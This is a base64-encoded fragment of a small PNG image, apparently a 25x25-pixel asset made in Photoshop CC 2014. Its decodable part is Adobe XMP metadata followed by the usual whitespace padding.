PNo3ujS6P8YuZlnM1VidWElsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIs OpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5 hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQ rAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9 rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1d T1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aX Dm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7 vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3S PVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKa RptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO 32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21 e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfV P1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i /suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8 IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAADr7aVRYdFhNTDpjb20uYWRvYmUueG1wAAAAAAA8 P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/Pgo8eDp4 bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1 LjYtYzAxNCA3OS4xNTY3OTcsIDIwMTQvMDgvMjAtMDk6NTM6MDIgICAgICAgICI+CiAgIDxyZGY6 UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5z IyI+CiAgICAgIDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiCiAgICAgICAgICAgIHhtbG5z OnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIKICAgICAgICAgICAgeG1sbnM6eG1w TU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iCiAgICAgICAgICAgIHhtbG5zOnN0 RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiCiAg ICAgICAgICAgIHhtbG5zOnBob3Rvc2hvcD0iaHR0cDovL25zLmFkb2JlLmNvbS9waG90b3Nob3Av MS4wLyIKICAgICAgICAgICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8x LjEvIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4w LyIKICAgICAgICAgICAgeG1sbnM6ZXhpZj0iaHR0cDovL25zLmFkb2JlLmNvbS9leGlmLzEuMC8i PgogICAgICAgICA8eG1wOkNyZWF0b3JUb29sPkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChNYWNp bnRvc2gpPC94bXA6Q3JlYXRvclRvb2w+CiAgICAgICAgIDx4bXA6Q3JlYXRlRGF0ZT4yMDE1LTAz LTIyVDA3OjUwOjI4LTA1OjAwPC94bXA6Q3JlYXRlRGF0ZT4KICAgICAgICAgPHhtcDpNZXRhZGF0 YURhdGU+MjAxNS0wMy0yMlQwNzo1MDoyOC0wNTowMDwveG1wOk1ldGFkYXRhRGF0ZT4KICAgICAg ICAgPHhtcDpNb2RpZnlEYXRlPjIwMTUtMDMtMjJUMDc6NTA6MjgtMDU6MDA8L3htcDpNb2RpZnlE YXRlPgogICAgICAgICA8eG1wTU06SW5zdGFuY2VJRD54bXAuaWlkOmQxMDU0MzZlLWY5ZTAtNDkx MS1iZTFiLTcwMzcxNDM4NTA4MjwveG1wTU06SW5zdGFuY2VJRD4KICAgICAgICAgPHhtcE1NOkRv Y3VtZW50SUQ+YWRvYmU6ZG9jaWQ6cGhvdG9zaG9wOjVmYTlmM2I1LTExMjAtMTE3OC1iOTIzLWZi MjdlNDc0YmQzYTwveG1wTU06RG9jdW1lbnRJRD4KICAgICAgICAgPHhtcE1NOk9yaWdpbmFsRG9j dW1lbnRJRD54bXAuZGlkOjA4ZTkxZjNlLWU3MjQtNDYzNC04YmJlLTFiNzRlNzMwMTA3NTwveG1w TU06T3JpZ2luYWxEb2N1bWVudElEPgogICAgICAgICA8eG1wTU06SGlzdG9yeT4KICAgICAgICAg ICAgPHJkZjpTZXE+CiAgICAgICAgICAgICAgIDxyZGY6bGkgcmRmOnBhcnNlVHlwZT0iUmVzb3Vy Y2UiPgogICAgICAgICAgICAgICAgICA8c3RFdnQ6YWN0aW9uPmNyZWF0ZWQ8L3N0RXZ0OmFjdGlv bj4KICAgICAgICAgICAgICAgICAgPHN0RXZ0Omluc3RhbmNlSUQ+eG1wLmlpZDowOGU5MWYzZS1l NzI0LTQ2MzQtOGJiZS0xYjc0ZTczMDEwNzU8L3N0RXZ0Omluc3RhbmNlSUQ+CiAgICAgICAgICAg ICAgICAgIDxzdEV2dDp3aGVuPjIwMTUtMDMtMjJUMDc6NTA6MjgtMDU6MDA8L3N0RXZ0OndoZW4+ CiAgICAgICAgICAgICAgICAgIDxzdEV2dDpzb2Z0d2FyZUFnZW50PkFkb2JlIFBob3Rvc2hvcCBD QyAyMDE0IChNYWNpbnRvc2gpPC9zdEV2dDpzb2Z0d2FyZUFnZW50PgogICAgICAgICAgICAgICA8 L3JkZjpsaT4KICAgICAgICAgICAgICAgPHJkZjpsaSByZGY6cGFyc2VUeXBlPSJSZXNvdXJjZSI+ CiAgICAgICAgICAgICAgICAgIDxzdEV2dDphY3Rpb24+c2F2ZWQ8L3N0RXZ0OmFjdGlvbj4KICAg ICAgICAgICAgICAgICAgPHN0RXZ0Omluc3RhbmNlSUQ+eG1wLmlpZDpkMTA1NDM2ZS1mOWUwLTQ5 MTEtYmUxYi03MDM3MTQzODUwODI8L3N0RXZ0Omluc3RhbmNlSUQ+CiAgICAgICAgICAgICAgICAg IDxzdEV2dDp3aGVuPjIwMTUtMDMtMjJUMDc6NTA6MjgtMDU6MDA8L3N0RXZ0OndoZW4+CiAgICAg ICAgICAgICAgICAgIDxzdEV2dDpzb2Z0d2FyZUFnZW50PkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0 IChNYWNpbnRvc2gpPC9zdEV2dDpzb2Z0d2FyZUFnZW50PgogICAgICAgICAgICAgICAgICA8c3RF dnQ6Y2hhbmdlZD4vPC9zdEV2dDpjaGFuZ2VkPgogICAgICAgICAgICAgICA8L3JkZjpsaT4KICAg ICAgICAgICAgPC9yZGY6U2VxPgogICAgICAgICA8L3htcE1NOkhpc3Rvcnk+CiAgICAgICAgIDxw aG90b3Nob3A6RG9jdW1lbnRBbmNlc3RvcnM+CiAgICAgICAgICAgIDxyZGY6QmFnPgogICAgICAg ICAgICAgICA8cmRmOmxpPnhtcC5kaWQ6NEMxRkU2RTZCQzREMTFFNEI3MDg5OEZGODlDRkQ2RUU8 L3JkZjpsaT4KICAgICAgICAgICAgPC9yZGY6QmFnPgogICAgICAgICA8L3Bob3Rvc2hvcDpEb2N1 bWVudEFuY2VzdG9ycz4KICAgICAgICAgPHBob3Rvc2hvcDpDb2xvck1vZGU+MzwvcGhvdG9zaG9w OkNvbG9yTW9kZT4KICAgICAgICAgPHBob3Rvc2hvcDpJQ0NQcm9maWxlPnNSR0IgSUVDNjE5NjYt Mi4xPC9waG90b3Nob3A6SUNDUHJvZmlsZT4KICAgICAgICAgPGRjOmZvcm1hdD5pbWFnZS9wbmc8 L2RjOmZvcm1hdD4KICAgICAgICAgPHRpZmY6T3JpZW50YXRpb24+MTwvdGlmZjpPcmllbnRhdGlv bj4KICAgICAgICAgPHRpZmY6WFJlc29sdXRpb24+NzIwMDAwLzEwMDAwPC90aWZmOlhSZXNvbHV0 aW9uPgogICAgICAgICA8dGlmZjpZUmVzb2x1dGlvbj43MjAwMDAvMTAwMDA8L3RpZmY6WVJlc29s dXRpb24+CiAgICAgICAgIDx0aWZmOlJlc29sdXRpb25Vbml0PjI8L3RpZmY6UmVzb2x1dGlvblVu aXQ+CiAgICAgICAgIDxleGlmOkNvbG9yU3BhY2U+MTwvZXhpZjpDb2xvclNwYWNlPgogICAgICAg ICA8ZXhpZjpQaXhlbFhEaW1lbnNpb24+MjU8L2V4aWY6UGl4ZWxYRGltZW5zaW9uPgogICAgICAg ICA8ZXhpZjpQaXhlbFlEaW1lbnNpb24+MjU8L2V4aWY6UGl4ZWxZRGltZW5zaW9uPgogICAgICA8 L3JkZjpEZXNjcmlwdGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg 